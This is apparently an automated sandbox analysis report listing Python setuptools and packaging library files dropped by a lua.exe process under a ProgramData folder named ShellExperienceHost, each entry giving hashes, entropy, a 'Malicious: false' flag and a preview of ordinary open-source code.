Preview:	def aix_platform(osname, version, release):. try:. import _aix_support. return _aix_support.aix_platform(). except ImportError:. pass. return "%s-%s.%s" % (osname, version, release).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\spawn.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4408
Entropy (8bit):	4.558267599669114
Encrypted:	false
SSDEEP:	96:kuIwY8HoGd2p5lH9LiAlL8/skM03YrYoTV0IWRvQZvu:kBwxouiDH9LiA5m3OJVkRvQZu
MD5:	4BD4351B7B67AEB0C3E2EF96CC027773
SHA1:	25FA45DE2AD1D48BF1D9E5C37A28223A9C8B7E72
SHA-256:	5C1994AB38715DF6B2FC9135F1191A6A51DFF64822ECDBD77813D6F417D3AA6C
SHA-512:	D2BACBF5B5CB86E64076B3B06C3DDFD1C7EDAE6AD90431A19F0F90607792465100DC2A65FCE5605BFA9C9C8C05C1AF3F3D45CEFDED3CA947124023B2324F1DD8
Malicious:	false
Preview:	"""distutils.spawn..Provides the 'spawn()' function, a front-end to various platform-.specific functions for launching another program in a sub-process..Also provides the 'find_executable()' to search the path for a given.executable name.."""..import sys.import os.import subprocess..from distutils.errors import DistutilsPlatformError, DistutilsExecError.from distutils.debug import DEBUG.from distutils import log...if sys.platform == 'darwin':. _cfg_target = None. _cfg_target_split = None...def spawn(cmd, search_path=1, verbose=0, dry_run=0, env=None):. """Run another program, specified as a command list 'cmd', in a new process... 'cmd' is just the argument list for the new process, ie.. cmd[0] is the program to run and cmd[1:] are the rest of its arguments.. There is no way to run a program with a name different from that of its. executable... If 'search_path' is true (the default), the system's executable. search path will be used to find the program; otherw

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\sysconfig.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21349
Entropy (8bit):	4.55017075397911
Encrypted:	false
SSDEEP:	384:zMf9ip1glA9n3iDXoUjr2ri21icLHfwC2C2BXSk4:si7gsiDXbh21icLHwN14
MD5:	EC96598FC94E9EE819A813DEC2552794
SHA1:	BB864C664C013FA71CD7A39D921F4B330E42FA17
SHA-256:	E73E79314EE05DE71E2FF1BD14AE9EC7ED8EBDD7885C945925A7EBB6D84971F5
SHA-512:	A5F012AFFAD6D36F0FD4AD7DE93BFD4BF649A1E644C5EFAD6CE96FE5980B7A40E6CD587A14B75481FFD8941FD78E64EB6403F1A5211FD988F1E06C977994780C
Malicious:	false
Preview:	"""Provide access to Python's configuration information. The specific.configuration variables available depend heavily on the platform and.configuration. The values may be retrieved using.get_config_var(name), and the list of variables is available via.get_config_vars().keys(). Additional convenience functions are also.available...Written by: Fred L. Drake, Jr..Email: <fdrake@acm.org>."""..import _imp.import os.import re.import sys..from .errors import DistutilsPlatformError..IS_PYPY = '__pypy__' in sys.builtin_module_names..# These are needed in a couple of spots, so just compute them once..PREFIX = os.path.normpath(sys.prefix).EXEC_PREFIX = os.path.normpath(sys.exec_prefix).BASE_PREFIX = os.path.normpath(sys.base_prefix).BASE_EXEC_PREFIX = os.path.normpath(sys.base_exec_prefix)..# Path to the base directory of the project. On Windows the binary may.# live in project/PCbuild/win32 or project/PCbuild/amd64..# set for cross builds.if "_PYTHON_PROJECT_BASE" in os.environ:.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\text_file.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12483
Entropy (8bit):	4.076446119699693
Encrypted:	false
SSDEEP:	192:z+7ssvAhA/eDm0SQ5d7aEKMkNkwrWAZBUp2c2iif0FKbrXD:z+poA/UjSQTaEK76rAAsr90AbrXD
MD5:	775B63B1447DDEC2680B3DAB7AEF79E5
SHA1:	93DF1B99DBBB819B59B14B9A68FAA08F80306C31
SHA-256:	3ECB8025E59D289A0B495FFA37A229079FB43DAF382B32D4B9C24C1516B3C372
SHA-512:	15ED2D8B91A49BAFC13931AB1124DAFC1932577261BDE425B61991D60D9E813AE2A9EB608E4DE932CDABAD75EE270C676FB3295D7F954BEBECC8DF383256CE8C
Malicious:	false
Preview:	"""text_file..provides the TextFile class, which gives an interface to text files.that (optionally) takes care of stripping comments, ignoring blank.lines, and joining lines with backslashes."""..import sys, io...class TextFile:. """Provides a file-like object that takes care of all the things you. commonly want to do when processing a text file that has some. line-by-line syntax: strip comments (as long as "#" is your. comment character), skip blank lines, join adjacent lines by. escaping the newline (ie. backslash at end of line), strip. leading and/or trailing whitespace. All of these are optional. and independently controllable... Provides a 'warn()' method so you can generate warning messages that. report physical line number, even if the logical line in question. spans multiple physical lines. Also provides 'unreadline()' for. implementing line-at-a-time lookahead... Constructor is called as:.. TextF

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\unixccompiler.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	14696
Entropy (8bit):	4.387763823586644
Encrypted:	false
SSDEEP:	192:zjf0GxMkxqDbeH5w80VWSbEEAwIg20/NTRo4NMudi1Ts:zjf0GqkxqDb6O80VWME7Y20VZNfiVs
MD5:	7307FDE58B5FDD1649D445DB7E487B89
SHA1:	ABB58584E5EDE26CC59892F530D6E3FAF7E85409
SHA-256:	13AE5E7428582E81D8F308B83B116EFF02ADDE125EDC6C9217ABF9D46FD9CCBD
SHA-512:	CE644DD93AEA091781534C6CACA8E2FDD471E19BAAA35C8319FB5A3836970B79082BC1945FD218E71CE807E226C7EDDD56A0D3BCCC46115663A7F09F957EE93E
Malicious:	false
Preview:	"""distutils.unixccompiler..Contains the UnixCCompiler class, a subclass of CCompiler that handles.the "typical" Unix-style command-line C compiler:. * macros defined with -Dname[=value]. * macros undefined with -Uname. * include search directories specified with -Idir. * libraries specified with -lllib. * library search directories specified with -Ldir. * compile handled by 'cc' (or similar) executable with -c option:. compiles .c to .o. * link static library handled by 'ar' command (possibly with 'ranlib'). * link shared library handled by 'cc -shared'."""..import os, sys, re..from distutils import sysconfig.from distutils.dep_util import newer.from distutils.ccompiler import \. CCompiler, gen_preprocess_options, gen_lib_options.from distutils.errors import \. DistutilsExecError, CompileError, LibError, LinkError.from distutils import log..if sys.platform == 'darwin':. import _osx_support..# XXX Things not currently handled:.# * optimization/debug/warning flag

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\util.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	20985
Entropy (8bit):	4.555097442203166
Encrypted:	false
SSDEEP:	384:yI5sE6dgsYH+MrHnEU0lK1bQlvseoBsWS63TP516aaTz6Z:yrE6dgsYpGKpIseoK03TP5gaGz6Z
MD5:	840663D1CDAF75FA57DEF16EC4741FC2
SHA1:	9BCC862FC99B84396DF27EE644E4F48D88F59495
SHA-256:	5A5CFD9E80A1263CDE9BD99F80EBBE29A37CB2807868D8517DEE151A5B5777CC
SHA-512:	5D68ECDD2EAE0ED03E789F2EBDBEA5CD97920422B93F5749BF2BD78E2C9A07A77788FD5F00C64655DC51A8B85ED54692F6FEF081A9A592EE63AEB28678BC1955
Malicious:	false
Preview:	"""distutils.util..Miscellaneous utility functions -- anything that doesn't fit into.one of the other *util.py modules.."""..import os.import re.import importlib.util.import string.import sys.from distutils.errors import DistutilsPlatformError.from distutils.dep_util import newer.from distutils.spawn import spawn.from distutils import log.from distutils.errors import DistutilsByteCompileError.from .py35compat import _optim_args_from_interpreter_flags...def get_host_platform():. """Return a string that identifies the current platform. This is used mainly to. distinguish platform-specific build directories and platform-specific built. distributions. Typically includes the OS name and version and the. architecture (as supplied by 'os.uname()'), although the exact information. included depends on the OS; eg. on Linux, the kernel version isn't. particularly important... Examples of returned values:. linux-i586. linux-alpha (?). solaris-2.6-sun4u..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\version.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	12514
Entropy (8bit):	4.44397524163708
Encrypted:	false
SSDEEP:	192:sJU2Oq4DIzmpJBZRTkXWXx3YiXGFUM1xDERenuaL+dy2yAJMJie+mWYJV:sJNEIz+JBZRvGUAxDERACcAJMJie+mWi
MD5:	860BD393FF00BA6FEC6FBC8D71DF8E28
SHA1:	A3FE4AA6A6B59425863A229D78D8D934D3D5882C
SHA-256:	F0DA203FA34F3D0A69DC450C65C4FD73310789AF9E86A3E8F2CA68FDEEC08145
SHA-512:	FD8AC5378BFC2D7B566531F236AC81C3F052882A2548448C893A4866C7A637851EF7C6D439BD820882E228BB19603CD58B2232E410CEDC701801049C34BDD752
Malicious:	false
Preview:	#.# distutils/version.py.#.# Implements multiple version numbering conventions for the.# Python Module Distribution Utilities..#.# $Id$.#.."""Provides classes to represent module version numbers (one class for.each style of version numbering). There are currently two such classes.implemented: StrictVersion and LooseVersion...Every version number class implements the following interface:. * the 'parse' method takes a string and parses it to some internal. representation; if the string is an invalid version number,. 'parse' raises a ValueError exception. * the class constructor takes an optional string argument which,. if supplied, is passed to 'parse'. * __str__ reconstructs the string that was passed to 'parse' (or. an equivalent string -- ie. one that will generate an equivalent. version number instance). * __repr__ generates Python code to recreate the version number instance. * _cmp compares the current instance with either another instance. of the same class

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_distutils\versionpredicate.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	5133
Entropy (8bit):	4.713441799183137
Encrypted:	false
SSDEEP:	96:xuu3rSTC21LgA2XIjygw/Bk38/GKzftyYdhchZCLqPQt:xuMee21CEFwp//RUYdyPQt
MD5:	DC6B9C874ED70FC65490A4AF9E632F5F
SHA1:	0CACD85ABE9EA4EB37F1057E040A1BF53B2AEB16
SHA-256:	671A4403E4D0BFCF2651673A85EB543B8A92A80DAC6BB8A98D9DD010AE5EBC39
SHA-512:	FFF9E0A8F65E053E4D91ACC2857BC399CDAB3F69CD40F994A39DA3FEF9519DFE8DA100F9AFDD48AA71F1D3624C9565F809A3E5EE7AD9CCF8A3CC1A76C1657AFF
Malicious:	false
Preview:	"""Module for parsing and testing package version predicate strings..""".import re.import distutils.version.import operator...re_validPackage = re.compile(r"(?i)^\s([a-z_]\w(?:\.[a-z_]\w))(.)",. re.ASCII).# (package) (rest)..re_paren = re.compile(r"^\s$(.)$\s$") # (list) inside of parentheses.re_splitComparison = re.compile(r"^\s(<=\|>=\|<\|>\|!=\|==)\s([^\s,]+)\s*$").# (comp) (version)...def splitUp(pred):. """Parse a single version comparison... Return (comparison string, StrictVersion). """. res = re_splitComparison.match(pred). if not res:. raise ValueError("bad package restriction syntax: %r" % pred). comp, verStr = res.groups(). return (comp, distutils.version.StrictVersion(verStr))..compmap = {"<": operator.lt, "<=": operator.le, "==": operator.eq,. ">": operator.gt, ">=": operator.ge, "!=": operator.ne}..class VersionPredicate:. """Parse and test package version predicates... >>> v = VersionPredicate('pyepat.abc (>1.0, <3333

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_imp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2388
Entropy (8bit):	4.790707655176412
Encrypted:	false
SSDEEP:	48:S8XXUjy914Oc1v5LNP44QweXlsNQatNbSApV0ZodTIOjFq8jn:zXXSunQc0eXuNzNbn0ZodTIcFqen
MD5:	F5BBD10E9AE2D65113208F0C842AE48B
SHA1:	A8E9C0B3E26B13C86B0FDC5697C86F614199148B
SHA-256:	431D0B27310169693FE8F7C809A989B5F04DDAB8792BDB09AB5C17BED656FA67
SHA-512:	EB67F931A753EF8E90E94FF736C09206783B2AE9D58F0B101A5EF8C40D62D268EBF89F347075C2DAD5765A49F5C73F13E2881B3E9D5B5F3042AAD97FCE84D1F3
Malicious:	false
Preview:	""".Re-implementation of find_module and get_frozen_object.from the deprecated imp module.."""..import os.import importlib.util.import importlib.machinery..from .py34compat import module_from_spec...PY_SOURCE = 1.PY_COMPILED = 2.C_EXTENSION = 3.C_BUILTIN = 6.PY_FROZEN = 7...def find_spec(module, paths):. finder = (. importlib.machinery.PathFinder().find_spec. if isinstance(paths, list) else. importlib.util.find_spec. ). return finder(module, paths)...def find_module(module, paths=None):. """Just like 'imp.find_module()', but with package support""". spec = find_spec(module, paths). if spec is None:. raise ImportError("Can't find %s" % module). if not spec.has_location and hasattr(spec, 'submodule_search_locations'):. spec = importlib.util.spec_from_loader('__init__.py', spec.loader).. kind = -1. file = None. static = isinstance(spec.loader, type). if spec.origin == 'frozen' or static and issubclass(. spec.lo

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\ordered_set.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15130
Entropy (8bit):	4.235131026628033
Encrypted:	false
SSDEEP:	384:X2zYoms8Wwi0uImzOKgW173/wiy/VDZa9ebTzVEbjym:hobwinkKlQ9I9ebTzVEbjym
MD5:	F3186384F56969ACBD47DD1E14431FD0
SHA1:	E036FB43B3FDB55291BB33008B375B4D9465C09C
SHA-256:	75B68272CDBB77237D827316185E6703F06B567E90F8DAE329826957DFDF801B
SHA-512:	99A0BF021448F74031C8A9ED7950C6EBE8E4134D537DA42774D500131F285CFE842E198150731DEA9BBE249E443364C9D79D3A18F530A8789C0A7F3A4B0FDE24
Malicious:	false
Preview:	""".An OrderedSet is a custom MutableSet that remembers its order, so that every.entry has an index that can be looked up...Based on a recipe originally posted to ActiveState Recipes by Raymond Hettiger,.and released under the MIT license..""".import itertools as it.from collections import deque..try:. # Python 3. from collections.abc import MutableSet, Sequence.except ImportError:. # Python 2.7. from collections import MutableSet, Sequence..SLICE_ALL = slice(None).__version__ = "3.1"...def is_iterable(obj):. """. Are we being asked to look up a list of things, instead of a single thing?. We check for the `__iter__` attribute so that this can cover types that. don't have to be known by this module, such as NumPy arrays... Strings, however, should be considered as atomic values to look up, not. iterables. The same goes for tuples, since they are immutable and therefore. valid entries... We don't need to check for the Python 2 `unicode` type, because i

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\__about__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	736
Entropy (8bit):	4.76082264257744
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17KjCy5IRnHt4oJDTFvqvUHC3u/5G/E4ZqQ9590/be2UHVjuEF/M:q9O0ope2PFNz14MHqwhQ95fDR/mBcl2B
MD5:	CB911241AF12A5D8C1B50DCA67A44753
SHA1:	10C90B41A21B9D7AE5DFD7935113AF35AF1E269B
SHA-256:	3CD32C6999F851C087CAE6E044E1F56E5E8296E76E3E3239905AD2A7F660925A
SHA-512:	EBB6E4C06FB81A90C5BB7B8F2E843AAD885B8FBAE16812B3A084D473CACE963AFBA97EDA9B123221CF6B33DB89FE576BC2E79A581E30F969667813FD70CEDF00
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..__all__ = [. "__title__",. "__summary__",. "__uri__",. "__version__",. "__author__",. "__email__",. "__license__",. "__copyright__",.]..__title__ = "packaging".__summary__ = "Core utilities for Python packages".__uri__ = "https://github.com/pypa/packaging"..__version__ = "20.4"..__author__ = "Donald Stufft and individual contributors".__email__ = "donald@stufft.io"..__license__ = "BSD-2-Clause or Apache-2.0".__copyright__ = "Copyright 2014-2019 %s" % __author__.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	562
Entropy (8bit):	4.355224934892913
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17KjCy5o5SfiJEgF4MNnRnHt4oJDTFvqvUHC3u/D:q9O0ope2p3JFNFNz14MHqK
MD5:	2EED0787819307CC2E25CF45A4A9B5AD
SHA1:	74E5F4A45CF9A2E4E3E1F66456676BC7C49B2FD1
SHA-256:	E9E9DBA795E045F8C18EC23DF9B9F4D078C77F94C7DB53C330E2A4256F31C3EC
SHA-512:	3DBE5D38DFBAFDAE2BD2D0BC621996E3B5B857E714BB2F24264A88D929349255F9332256CE01121B8E19BA9F2ACE51D5DA9DB3898066F43AD2F4975ED2692537
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..from .__about__ import (. __author__,. __copyright__,. __email__,. __license__,. __summary__,. __title__,. __uri__,. __version__,.)..__all__ = [. "__title__",. "__summary__",. "__uri__",. "__version__",. "__author__",. "__email__",. "__license__",. "__copyright__",.].

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\_compat.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1128
Entropy (8bit):	4.823343997423168
Encrypted:	false
SSDEEP:	24:q9O0ope29ny8bGk74hgcTGMfXLAmZOZGjNB2tdJBN2U:IDo8IZKk4hNZOZcQtdJBNv
MD5:	6D5FC01182E0EBBDAA4327FD5CEF0655
SHA1:	8E738F123389098CEBA20249672A339C0015B2D5
SHA-256:	31776C1A9484FD6F99AC7A02F3B6A7748E0B576140C14EC72CBF9E1DEFC28E15
SHA-512:	4C7F2B9C3059D050C5B7EA1617AC499CAD3746C214BCB7BBEBA68A2EF58441DB3CCFCBBBBCA4BDB1DE65CB9E5BB93B7A4AEF7615747E7D0C8802A7614E191811
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import sys..from ._typing import TYPE_CHECKING..if TYPE_CHECKING: # pragma: no cover. from typing import Any, Dict, Tuple, Type...PY2 = sys.version_info[0] == 2.PY3 = sys.version_info[0] == 3..# flake8: noqa..if PY3:. string_types = (str,).else:. string_types = (basestring,)...def with_metaclass(meta, *bases):. # type: (Type[Any], Tuple[Type[Any], ...]) -> Any. """. Create a base class with a metaclass.. """. # This requires a bit of explanation: the basic idea is to make a dummy. # metaclass for one level of class instantiation that replaces itself with. # the actual metaclass.. class metaclass(meta): # type: ignore. def __new__(cls, name, this_bases, d):. # type: (Type[Any], str, Tuple[Any]

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\_structures.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2022
Entropy (8bit):	4.342922127361113
Encrypted:	false
SSDEEP:	48:IDo8V6hdrdljmExXrEVWXrEVo6UjmExXrEVWXrEVedWdv:F32EUNEE
MD5:	2A2F319784450ED303D86E6524053F42
SHA1:	B6B3552024C5BC24DF9F000E34E13B6A37992EE5
SHA-256:	A339025FC43C7F6A84D4489CDD8890E1BB8355F833DA261EBD8F5EED1DB2DE26
SHA-512:	55CA410AA4222751656BA1D5C8B7C1CEF972DB9333F8115CB3CC91FC3CED293AADA426895B96BE81BA4FD1587B7A7AADB8E6A467E50E82D71C423D4226089291
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function...class InfinityType(object):. def __repr__(self):. # type: () -> str. return "Infinity".. def __hash__(self):. # type: () -> int. return hash(repr(self)).. def __lt__(self, other):. # type: (object) -> bool. return False.. def __le__(self, other):. # type: (object) -> bool. return False.. def __eq__(self, other):. # type: (object) -> bool. return isinstance(other, self.__class__).. def __ne__(self, other):. # type: (object) -> bool. return not isinstance(other, self.__class__).. def __gt__(self, other):. # type: (object) -> bool. return True.. def __ge__(self, other):. # type: (object) -> bool. return True..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\_typing.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1812
Entropy (8bit):	4.751869054200876
Encrypted:	false
SSDEEP:	48:xWbqWeWBqxBXoYxtKwXF8opwKjtuvMiqF:y3cr4KkOpgi
MD5:	B0DAC8EF6953FB835C7D633E6A427BA7
SHA1:	F521B39E0501E178412D557AC85D625626B85326
SHA-256:	C79F44850E7B4CC4FE9134722D9576E4766F6061B06EE713A3A88A87F3B4B4CC
SHA-512:	DE5D2189075A26DC2E9BA41C1BBF2D4CCD3D5FB475802A0D7A70E311A301C4C4CB619D9F15C6263A420583B4F8BF87FCD589D6F96FE7B1EDC367B875D54CFDDA
Malicious:	false
Preview:	"""For neatly implementing static typing in packaging...`mypy` - the static type analysis tool we use - uses the `typing` module, which.provides core functionality fundamental to mypy's functioning...Generally, `typing` would be imported at runtime and used in that fashion -.it acts as a no-op at runtime and does not have any run-time overhead by.design...As it turns out, `typing` is not vendorable - it uses separate sources for.Python 2/Python 3. Thus, this codebase can not expect it to be present..To work around this, mypy allows the typing import to be behind a False-y.optional to prevent it from running at runtime and type-comments can be used.to remove the need for the types to be accessible directly during runtime...This module provides the False-y guard in a nicely named fashion so that a.curious maintainer can reach here to read this...In packaging, all static-typing related imports should be guarded as follows:.. from packaging._typing import TYPE_CHECKING.. if TYPE_CHEC

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\markers.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9509
Entropy (8bit):	4.813926191712438
Encrypted:	false
SSDEEP:	192:Fz6ayaKUTfexKz3QgleanMaD/7sEURo6RMAY0w9C:Fz6FUTexKz3QyMsAnZRDw9C
MD5:	D50F21A53F78DC4CEEF1C4662FD626FC
SHA1:	8B73EDA59FF8500FFC6706A00E43AE5A84D4D78D
SHA-256:	0420B165BB7CC60CAC1FCBF9A6A6CB91DB509D164720690942A94D0467A4E274
SHA-512:	B0C59845101DFC113EF56DDAF36ED83714B44953557EB4F0CE981F4362A3759AE43EF38EC37BC85677AC64D7ACB506AD604F9C5DD9EBF403C60877FF34055679
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import operator.import os.import platform.import sys..from setuptools.extern.pyparsing import ParseException, ParseResults, stringStart, stringEnd.from setuptools.extern.pyparsing import ZeroOrMore, Group, Forward, QuotedString.from setuptools.extern.pyparsing import Literal as L # noqa..from ._compat import string_types.from ._typing import TYPE_CHECKING.from .specifiers import Specifier, InvalidSpecifier..if TYPE_CHECKING: # pragma: no cover. from typing import Any, Callable, Dict, List, Optional, Tuple, Union.. Operator = Callable[[str, str], bool]...__all__ = [. "InvalidMarker",. "UndefinedComparison",. "UndefinedEnvironmentName",. "Marker",. "default_environment",.]...class InvalidMarker(ValueError):. """. An i

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\requirements.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4917
Entropy (8bit):	5.08863487933049
Encrypted:	false
SSDEEP:	96:FZSRgpYRDjkIyzxNxP9TGuHg/U3dNLGNdfPeszOBIqev0BDuh:FURMacaYLCkIzvKY
MD5:	EFDCADB07730A5BC778F4E9A0586D70A
SHA1:	D05BC66794E74550B2A423449095B56DB9E47606
SHA-256:	547C9D65D93C9B7A85C517A898DC0AAFBD5C9A98DA9ED115FF13A1904CB220D2
SHA-512:	0859DE00B53EF753E4199CE44A47D78E5FB5B11CDD18F637C5DE2B2D299BA0C35B71FEB392173E110520C67B02DEE75C28AA7829B4A953DB48483D3EB1E5C355
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import string.import re..from setuptools.extern.pyparsing import stringStart, stringEnd, originalTextFor, ParseException.from setuptools.extern.pyparsing import ZeroOrMore, Word, Optional, Regex, Combine.from setuptools.extern.pyparsing import Literal as L # noqa.from urllib import parse as urlparse..from ._typing import TYPE_CHECKING.from .markers import MARKER_EXPR, Marker.from .specifiers import LegacySpecifier, Specifier, SpecifierSet..if TYPE_CHECKING: # pragma: no cover. from typing import List...class InvalidRequirement(ValueError):. """. An invalid requirement was found, users should refer to PEP 508.. """...ALPHANUM = Word(string.ascii_letters + string.digits)..LBRACKET = L("[").suppress().RBRACKET = L("]").suppress().LPA

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\specifiers.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	31944
Entropy (8bit):	4.309184167775029
Encrypted:	false
SSDEEP:	384:FFhKj+BkVQ9IEszaYuhdwhOuhEFIOI10liN36fRZMnQKx/OIGtNbc6:lKIkVlEs7uhdwhOuhEFxISlO9Qg/O9g6
MD5:	8E104C1478944512DB1284C6425D7E5C
SHA1:	7761CF1DF1CA1144DCE6A5D04B88E2E4179FDCAB
SHA-256:	B98A7D975DC5D0B7249D2E9DE0DEB4CAD88180598884A89D78EABD027B314DCA
SHA-512:	00C42FC324332D04A438987D70AFFFAD855800CD9FE7F6CF52B62321AA2718E70814ABE8076FEA2FE158D32779DFD44DC0232C92EDC6307AB83C7B7E38CE45EA
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import abc.import functools.import itertools.import re..from ._compat import string_types, with_metaclass.from ._typing import TYPE_CHECKING.from .utils import canonicalize_version.from .version import Version, LegacyVersion, parse..if TYPE_CHECKING: # pragma: no cover. from typing import (. List,. Dict,. Union,. Iterable,. Iterator,. Optional,. Callable,. Tuple,. FrozenSet,. ).. ParsedVersion = Union[Version, LegacyVersion]. UnparsedVersion = Union[Version, LegacyVersion, str]. CallableOperator = Callable[[ParsedVersion, str], bool]...class InvalidSpecifier(ValueError):. """. An invalid specifier was found, users should refer to PEP 440.. """...class BaseSp

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\tags.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	24067
Entropy (8bit):	4.80313202952782
Encrypted:	false
SSDEEP:	384:FSdp8Ay8XuveWXnE/3okOEl2hx1plf3BoQYKMKEp9xkzOw9J0sZTp0d5BHUfbvOO:8drUvtnE/okOEl2hx1plf3BoQ3D69xkh
MD5:	5976599D204E1C99A69A745701CD1331
SHA1:	C8AC635F74B5F9A23845EBBF95CE5DDF12C51470
SHA-256:	34A312DFB668FE75AB67182C0FACDB5EC5E073D79D9FD9B5EB470188B98725D1
SHA-512:	6E52BDC7B6FB593C3450002F622A1A4A8572932EC5CE108F661900A492D9C89CE042739767F8CF46AA0C3D88A448B8C7217C0AC0072C914F56E43865DC32FCB6
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import..import distutils.util..try:. from importlib.machinery import EXTENSION_SUFFIXES.except ImportError: # pragma: no cover. import imp.. EXTENSION_SUFFIXES = [x[0] for x in imp.get_suffixes()]. del imp.import logging.import os.import platform.import re.import struct.import sys.import sysconfig.import warnings..from ._typing import TYPE_CHECKING, cast..if TYPE_CHECKING: # pragma: no cover. from typing import (. Dict,. FrozenSet,. IO,. Iterable,. Iterator,. List,. Optional,. Sequence,. Tuple,. Union,. ).. PythonVersion = Sequence[int]. MacVersion = Tuple[int, int]. GlibcVersion = Tuple[int, int]...logger = logging.getLogger(__name__)..INTERPRETER_SHORT_NAMES = {. "python": "

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1811
Entropy (8bit):	4.76405669637177
Encrypted:	false
SSDEEP:	24:q9O0ope2D6gpeS1ujJcz55V5+It5yzlQQkMNx/U9wytUvWY09ab1LJ0ztjVx:IDo8HKac1V+IMl7xs9wyaR0Mb9q1Vx
MD5:	ED9896111C9B49550314BC6B238E5A11
SHA1:	F0B8F8941F45F8A4821CBF564BE73FD27524651A
SHA-256:	452865BE78CED82B58483F2EAE2DF67EB30C14C4E607EDE286CAB5FA08732C4C
SHA-512:	46558CA841C4A65EC41458E018C7D1850D5851E54AD0C5F04F3B201B5D24DB44A3A24C4F2959CFAFF491B575DE16798962AE18B290656B1000C78848B1507AC1
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details..from __future__ import absolute_import, division, print_function..import re..from ._typing import TYPE_CHECKING, cast.from .version import InvalidVersion, Version..if TYPE_CHECKING: # pragma: no cover. from typing import NewType, Union.. NormalizedName = NewType("NormalizedName", str).._canonicalize_regex = re.compile(r"[-_.]+")...def canonicalize_name(name):. # type: (str) -> NormalizedName. # This is taken from PEP 503.. value = _canonicalize_regex.sub("-", name).lower(). return cast("NormalizedName", value)...def canonicalize_version(_version):. # type: (str) -> Union[Version, str]. """. This is very similar to Version.__str__, but has one subtle difference. with the way it handles the release segment.. """.. try:. version = Version(_version). except InvalidVe

C:\ProgramData\ShellExperienceHost\Lib\site-packages\setuptools\_vendor\packaging\version.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	15470
Entropy (8bit):	4.505586612608989
Encrypted:	false
